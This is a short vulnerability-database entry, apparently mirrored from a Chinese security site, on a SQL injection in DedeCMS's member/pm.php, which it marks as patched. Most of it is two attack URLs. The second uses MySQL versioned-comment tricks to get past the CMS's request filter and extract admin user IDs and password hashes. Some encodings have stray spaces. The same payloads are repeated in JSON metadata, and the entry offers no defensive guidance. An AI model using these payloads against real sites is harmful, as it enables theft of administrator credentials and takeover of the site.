ID MYHACK58:62201442255
Type myhack58
Reporter 佚名
Modified 2014-02-08T00:00:00
Description
漏洞 文件 member/pm.php (the official has been patched)
http://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and char(@``) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%2 0% 2 3
Safe Alert: Request Error step 1 !
http://127.0.0.1/dede/member/pm.php?dopost=read&id=1'and char(@`) and 1=2+/*! 50000Union*/ +/*! 50000select*/ +1,2,3,4,5,6,userid,8,9,1 0,1 1,pwd+from+%2 3@__admin`%2 3
{"type": "myhack58", "edition": 1, "title": "DEDECMS members of the center injection member/pm. php-vulnerability warning-the black bar safety net", "references": [], "bulletinFamily": "info", "published": "2014-02-08T00:00:00", "lastseen": "2016-11-12T17:56:10", "modified": "2014-02-08T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2014/42255.htm", "viewCount": 0, "reporter": "\u4f5a\u540d", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 1.0, "vector": "NONE", "modified": "2016-11-12T17:56:10", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-12T17:56:10", "rev": 2}, "vulnersScore": 1.0}, "cvelist": [], "id": "MYHACK58:62201442255", "description": "\u6f0f\u6d1e \u6587\u4ef6 member/pm.php (the official has been patched)\n\nhttp://127.0.0.1/dede/member/pm.php?dopost=read&id=1' and char(@``) and 1=2+UniOn+SelEct 1,2,3,4,5,6,7,8,9,10,11,12%2 0% 2 3\n\nSafe Alert: Request Error step 1 !\n\nhttp://127.0.0.1/dede/member/pm.php?dopost=read&id=1'and char(@``) and 1=2+/*! 50000Union*/ +/*! 50000select*/ +1,2,3,4,5,6,userid,8,9,1 0,1 1,pwd+from+`%2 3@__admin`%2 3\n"}
{}
